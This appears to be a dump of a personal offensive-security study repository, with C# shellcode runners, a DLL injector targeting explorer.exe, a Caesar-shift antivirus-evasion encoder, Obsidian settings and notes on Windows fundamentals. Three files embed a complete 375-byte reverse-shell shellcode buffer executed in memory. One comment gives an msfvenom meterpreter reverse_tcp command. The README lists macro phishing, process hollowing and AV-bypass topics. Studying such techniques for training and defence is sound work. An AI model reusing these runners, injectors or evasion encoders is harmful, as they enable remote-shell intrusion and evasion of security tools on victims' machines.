buf.Length, out outSize); 28 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 29 | } 30 | } 31 | } -------------------------------------------------------------------------------- /Antivirus Evasion/C# Programs/CaesarEncoder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace Program 8 | { 9 | public class CaesarEncoder 10 | { 11 | public static void Main(string[] args) 12 | { 13 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= EXITFUNC=thread -f csharp 14 | byte[] buf = new byte[0] { }; 15 | 16 | byte[] encoded = new byte[buf.Length]; 17 | for (int i = 0; i < buf.Length; i++) 18 | { 19 | encoded[i] = (byte)(((uint)buf[i] + 5 ) & 0xff); // Caesar Shift of 5 with key as 0xff 20 | } 21 | 22 | StringBuilder hex = new StringBuilder(encoded.Length * 2); 23 | int totalCount = encoded.Length; 24 | for (int count = 0; count < totalCount; count++) 25 | { 26 | byte b = encoded[count]; 27 | 28 | if ((count + 1) == totalCount) // Dont append comma for last item 29 | { 30 | hex.AppendFormat("0x{0:x2}", b); 31 | } 32 | else 33 | { 34 | hex.AppendFormat("0x{0:x2}, ", b); 35 | } 36 | 37 | if ((count + 1) % 15 == 0) 38 | { 39 | hex.Append("\n"); 40 | } 41 | } 42 | 43 | Console.WriteLine($"AND Payload (KEY : 0xff):"); 44 | Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};"); 45 | } 46 | } 47 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "", 3 | "commitDateFormat": "DD-MM-YYYY HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": false, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | "refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": false, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "lineAuthor": { 30 | "show": false, 31 | "followMovement": "inactive", 32 | "authorDisplay": "initials", 33 | "showCommitHash": false, 34 | "dateTimeFormatOptions": "date", 35 | "dateTimeFormatCustomString": "YYYY-MM-DD HH:mm", 36 | "dateTimeTimezone": "viewer-local", 37 | "coloringMaxAge": "1y", 38 | "colorNew": { 39 | "r": 255, 40 | "g": 150, 41 | "b": 150 42 | }, 43 | "colorOld": { 44 | "r": 120, 45 | "g": 160, 46 | "b": 255 47 | }, 48 | "textColorCss": "var(--text-muted)", 49 | "ignoreWhitespace": false, 50 | "gutterSpacingFallbackLength": 5, 51 | "lastShownAuthorDisplay": "initials", 52 | "lastShownDateTimeFormatOptions": "date" 53 | }, 54 | "autoCommitMessage": "vault backup: {{date}}" 55 | } -------------------------------------------------------------------------------- /.obsidian/plugins/table-editor-obsidian/styles.css: -------------------------------------------------------------------------------- 1 | :root { 2 | --advanced-tables-helper-size: 28px; 3 | } 4 | 5 | .HyperMD-table-row span.cm-inline-code { 6 | font-size: 100%; 7 | padding: 0px; 8 | } 9 | 10 | .advanced-tables-buttons>div>.title { 11 | font-weight: var(--font-medium); 12 | font-size: var(--nav-item-size); 13 | color: var(--nav-item-color); 14 | text-decoration: underline; 15 | } 16 | 17 | [data-type="advanced-tables-toolbar"] .nav-buttons-container { 18 | column-gap: 0.2rem; 19 | margin: 0.2rem 0 0.2rem 0; 20 | justify-content: start; 21 | } 22 | 23 | [data-type="advanced-tables-toolbar"] .nav-buttons-container::before { 24 | min-width: 2.6rem; 25 | line-height: var(--advanced-tables-helper-size); 26 | font-size: var(--nav-item-size); 27 | font-weight: var(--nav-item-weight); 28 | color: var(--nav-item-color); 29 | } 30 | 31 | [data-type="advanced-tables-toolbar"] .nav-buttons-container>* { 32 | height: var(--advanced-tables-helper-size); 33 | line-height: var(--advanced-tables-helper-size); 34 | } 35 | 36 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button { 37 | width: var(--advanced-tables-helper-size); 38 | height: var(--advanced-tables-helper-size); 39 | display: flex; 40 | justify-content: center; 41 | align-items: center; 42 | border-radius: var(--radius-s); 43 | } 44 | 45 | [data-type="advanced-tables-toolbar"] .nav-buttons-container .nav-action-button:hover { 46 | background-color: var(--nav-item-background-hover); 47 | color: var(--nav-item-color-hover); 48 | font-weight: var(--nav-item-weight-hover); 49 | } 50 | 51 | .advanced-tables-row-label { 52 | width: 50px; 53 | } 54 | 55 | .widget-icon { 56 | width: 20px; 57 | height: 20px; 58 | fill: var(--text-muted); 59 | } 60 | 61 | .widget-icon:hover { 62 | fill: var(--text-normal); 63 | } 64 | 65 | .advanced-tables-csv-export textarea { 66 | height: 200px; 67 | width: 100%; 68 | } 69 | 70 | .advanced-tables-donation { 71 | width: 70%; 72 | margin: 0 auto; 73 | text-align: center; 74 | } 75 | 76 | .advanced-tables-donate-button { 77 | margin: 10px; 78 | } -------------------------------------------------------------------------------- /Process Injection and Migration/C# Programs/dll-injection.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Net; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace Inject 8 | { 9 | class Program 10 | { 11 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 12 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 13 | 14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 15 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 16 | 17 | [DllImport("kernel32.dll")] 18 | static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 19 | 20 | [DllImport("kernel32.dll")] 21 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 22 | 23 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 24 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 25 | 26 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 27 | public static extern IntPtr GetModuleHandle(string lpModuleName); 28 | 29 | static void Main(string[] args) 30 | { 31 | String dir = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments); 32 | String dllName = dir + "\\shell.dll"; 33 | WebClient wc = new WebClient(); 34 | wc.DownloadFile("", dllName); 35 | Process[] expProc = Process.GetProcessesByName("explorer"); 36 | int pid = expProc[0].Id; 37 | IntPtr hProcess = OpenProcess(0x001F0FFF, false, pid); 38 | IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40); 39 | IntPtr outSize; 40 | Boolean res = WriteProcessMemory(hProcess, addr, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize); 41 | IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); 42 | IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero); 43 | } 44 | } 45 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Topics 2 | 3 | - [Operating System and Programming Fundamentals](./Operating-System-and-Programming-Fundamentals/README.md) 4 | - Low Level Programming Languages 5 | - Programming Concepts 6 | - Windows Concepts 7 | - Windows on Windows 8 | - Win32 API 9 | - Windows Registry 10 | - [Client Side Code Execution with Office](./Client-Side-Code-Execution-With-Office/README.md) 11 | - Droppers 12 | - HTML Smuggling 13 | - Phishing With Microsoft Office 14 | - Basic Macro Payloads 15 | - Security Settings of Microsoft Office 16 | - Opening cmd.exe from macros 17 | - Powershell with Macros 18 | - Phishing user into disabling protected view and Enabling Macros 19 | - Shellcode Execution in word Memory 20 | - Interacting with Win32 API from VBA 21 | - In-Memory Shellcode runner in VBA 22 | - Shellcode Runner using Powershell 23 | - Calling Win32 API from Powershell 24 | - Shellcode Runner in Powershell 25 | - In-Memory Shellcode Runner in Powershell 26 | - Problem with Add-Type 27 | - Leveraging UnsafeNativemethods 28 | - Reflection Shellcode Runner in Powershell 29 | - Working With Proxy 30 | - [Client Side Code Execution with Windows Script Host](./Client-Side-Execution-With-Windows-Script-Host/README.md) 31 | - Basic Dropper in Jscript 32 | - Jscript and C# 33 | - DotNetToJscript 34 | - Win32 API calls from C# 35 | - Shellcode Runner in C# using Win32 API 36 | - Jscript Shellcode Runner 37 | - SharpShooter 38 | - Reflective Load of Win32 API for In-Memory Powershell 39 | - [Process Injection and Migration](./Process%20Injection%20and%20Migration/README.md) 40 | - Process Injection 41 | - Process Injection Theory 42 | - Process Injection in C# 43 | - DLL Injection 44 | - DLL Injection Theory 45 | - DLL Injection in C# 46 | - Reflective DLL Injection 47 | - Process Hollowing 48 | - [Antivirus Evasion](./Antivirus%20Evasion/README.md) 49 | - Overview 50 | - Signature Based Detection 51 | - Bypassing AV with Metasploit 52 | - Encoders 53 | - Encrypters 54 | - Bypassing AV with C# 55 | - Caesar Cipher 56 | - Sleep Timers 57 | - Non-Emulated APIs 58 | - Bypassing AV with Office 59 | - AV Bypass with VBA 60 | - VBA Stomping 61 | - Powershell in VBA 62 | - Dechaining with WMI 63 | - Obfuscating VBA 64 | - [Advanced Antivirus Evasion](./Advanced%20Antivirus%20Evasion/README.md) 65 |   66 | 67 | # Disclaimer 68 | 69 | This repo is still work in progress. Any errors or suggestions can be conveyed by raising an issue. You can contact me directly on my [Discord](https://discordapp.com/users/706779776349765722) or [Twitter](https://twitter.com/xCipher007) 70 | -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/JscriptShellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | [ComVisible(true)] 5 | public class JscriptShellcode 6 | { 7 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 8 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,uint flAllocationType, uint flProtect); 9 | 10 | [DllImport("kernel32.dll")] 11 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, 12 | IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 13 | 14 | [DllImport("kernel32.dll")] 15 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 16 | public JscriptShellcode() 17 | { 18 | byte[] buf = new byte[375] {0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0x50,0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x7f,0x00,0x00,0x01,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 }; 19 | int size = buf.Length; 20 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 21 | Marshal.Copy(buf, 0, addr, size); 22 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0,IntPtr.Zero); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ShellcodeRunner.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Diagnostics; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace ShellcodeRunner 10 | { 11 | class Program 12 | { 13 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 14 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 15 | 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 18 | 19 | [DllImport("kernel32.dll")] 20 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 21 | static void Main(string[] args) 22 | { 23 | byte[] buf = new byte[375] {0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0x50,0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x7f,0x00,0x00,0x01,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 }; 24 | int size = buf.Length; 25 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 26 | Marshal.Copy(buf, 0, addr, size); 27 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 28 | WaitForSingleObject(hThread, 0xFFFFFFFF); 29 | } 30 | } 31 | } -------------------------------------------------------------------------------- /Client-Side-Execution-With-Windows-Script-Host/C# Programs/ReflectiveLoad.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace ReflectiveLoad 5 | { 6 | public class Class1 7 | { 8 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 9 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 10 | 11 | [DllImport("kernel32.dll")] 12 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 13 | 14 | [DllImport("kernel32.dll")] 15 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 16 | public static void runner() 17 | { 18 | byte[] buf = new byte[375] { 0xfc, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x60, 0x31, 0xd2, 0x89, 0xe5, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x49, 0x75, 0xef, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4c, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0x50, 0x85, 0xc9, 0x74, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe0, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xe9, 0x80, 0xff, 0xff, 0xff, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0x89, 0xe8, 0xff, 0xd0, 0xb8, 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02, 0x00, 0x01, 0xbb, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40, 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56, 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0xff, 0x4e, 0x08, 0x75, 0xec, 0xe8, 0x67, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x36, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a, 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00, 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x68, 0x00, 0x40, 0x00, 0x00, 0x6a, 0x00, 0x50, 0x68, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x68, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x5e, 0x5e, 0xff, 0x0c, 0x24, 0x0f, 0x85, 0x70, 0xff, 0xff, 0xff, 0xe9, 0x9b, 0xff, 0xff, 0xff, 0x01, 0xc3, 0x29, 0xc6, 0x75, 0xc1, 0xc3, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5 }; 19 | int size = buf.Length; 20 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 21 | Marshal.Copy(buf, 0, addr, size); 22 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Operating-System-and-Programming-Fundamentals/README.md: -------------------------------------------------------------------------------- 1 | # Low Level Programming Languages 2 | 3 | Best examples are C and assembly. Code from Low level languages are converted to Opcodes through compilation process and is directly executed by the CPU. Applications written in such languages must perform their own memory management and hence are also referred as unmanaged code. 4 | 5 | > Opcode : A Binary value which the CPU maps to a specific action 6 | 7 | Languages like Java and C# are Object Oriented Programming Languages and compile in a much different way. 8 | 9 | > Code > Processed by installed virtual machine > bytecode > opcodes 10 | 11 | Java uses JVM (Java Virtual Machine), C# uses CLR (Common language runtime) 12 | 13 |   14 | 15 | # Programming Concepts 16 | 17 | - **Class** : Templates for creating Objects 18 | - Object is instantiated from it's class through a special method called **Contructor** 19 | - A constructor is typically named after it's class and is used to setup and initialize the instance variable of a class 20 | - **Modifier** : Determine the scope of a variable or method. 21 | 22 |   23 | 24 | # Windows Concepts 25 | 26 | ## Windows on Windows 27 | 28 | Most Windows based OS are now 64-bit, but there are still some 32-bit applications. 29 | 30 | Microsoft introduced the Windows on windows 64-bit (**WOW64**) which allows 64-bit versions of the OS to execute 32-bit application with almost zero loss in efficiency. 31 | 32 | To facilitate translations between the 32-bit applications and the kernel, WOW64 uses four 64-bit libraries to emulate the execution of 32-bit apps. These are : 33 | 34 | - Ntdll.dll 35 | - Wow64.dll 36 | - Wow64Win.dll 37 | - Wow64Cpu.dll 38 | 39 | On 64-bit windows, 64-bit native applications and dll's are stored in **C:\Windows\System32** while the 32-bit versions are stored in **C:\Windows\SysWOW64**. 40 | 41 |   42 | 43 | ## Win32 APIs 44 | 45 | Applications for windows can be built using various programming languages, but many of those make use of the Windows provided built-in APIs. These interfaces known as the Win32 API provide developers with pre-built functionalities. 46 | 47 | Example: 48 | 49 | **GetUserNameA** API exported by **Advapi32.dll** which retrieves the name of the user executing the function. 50 | 51 | Function Prototype 52 | 53 | BOOL GetUserNameA( 54 | LPSTR lpBuffer, 55 | LPDWORD pcbBuffer 56 | ); 57 | 58 | This API requires two arguments :- 59 | 60 | 1. Output buffer of type LPSTR 61 | 2. Pointer to DWORD which is a 32-bit unsigned integer 62 | 63 | The return value is boolean. 64 | 65 | > Suffix "A" indicates ASCII version of the API and suffix "W" indicated the Unicode version 66 | 67 | The Unicode version of the same code would be :- 68 | 69 | BOOL GetUserNameW( 70 | LPWSTR lpBuffer, 71 | LPDWORD pcbBuffer 72 | ); 73 | 74 | The first argument now is LPWSTR which is the Unicode character array. 75 | 76 |   77 | 78 | ## Windows Registry 79 | 80 | The registry is effectively a database that consists of a massive number of keys with associated values. These keys are sorted hierarchically using subkeys. 81 | 82 | > **HKEY_CURRENT_USER (HKCU)** hive : Information related to current user. \ 83 | > **HKEY_LOCAL_MACHINE (HKLM)** hive : Information related to Operating System. 84 | 85 | Note : Each hive also contains a duplicate section called Wow6432Node which stores the 32-bit settings. 86 | -------------------------------------------------------------------------------- /.obsidian/workspace: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "580c51f730ae9f7d", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "105ec597a03fc203", 8 | "type": "leaf", 9 | "state": { 10 | "type": "markdown", 11 | "state": { 12 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 13 | "mode": "source", 14 | "source": false 15 | } 16 | } 17 | } 18 | ], 19 | "direction": "vertical" 20 | }, 21 | "left": { 22 | "id": "97d87bf82fdc3776", 23 | "type": "split", 24 | "children": [ 25 | { 26 | "id": "70d8ef3ca3469d01", 27 | "type": "tabs", 28 | "children": [ 29 | { 30 | "id": "ef4849ca2a3ccf14", 31 | "type": "leaf", 32 | "state": { 33 | "type": "file-explorer", 34 | "state": {} 35 | } 36 | }, 37 | { 38 | "id": "0a7aca5e57051a60", 39 | "type": "leaf", 40 | "state": { 41 | "type": "search", 42 | "state": { 43 | "query": "", 44 | "matchingCase": false, 45 | "explainSearch": false, 46 | "collapseAll": false, 47 | "extraContext": false, 48 | "sortOrder": "alphabetical" 49 | } 50 | } 51 | }, 52 | { 53 | "id": "4d9b2d9291ca8cd4", 54 | "type": "leaf", 55 | "state": { 56 | "type": "starred", 57 | "state": {} 58 | } 59 | } 60 | ] 61 | } 62 | ], 63 | "direction": "horizontal", 64 | "width": 300 65 | }, 66 | "right": { 67 | "id": "dabaab5abe0a3ea3", 68 | "type": "split", 69 | "children": [ 70 | { 71 | "id": "a39ebfa97e1e8971", 72 | "type": "tabs", 73 | "children": [ 74 | { 75 | "id": "d774fb5bd034abff", 76 | "type": "leaf", 77 | "state": { 78 | "type": "backlink", 79 | "state": { 80 | "file": "Client-Side-Execution-With-Windows-Script-Host/README.md", 81 | "collapseAll": false, 82 | "extraContext": false, 83 | "sortOrder": "alphabetical", 84 | "showSearch": false, 85 | "searchQuery": "", 86 | "backlinkCollapsed": false, 87 | "unlinkedCollapsed": true 88 | } 89 | } 90 | }, 91 | { 92 | 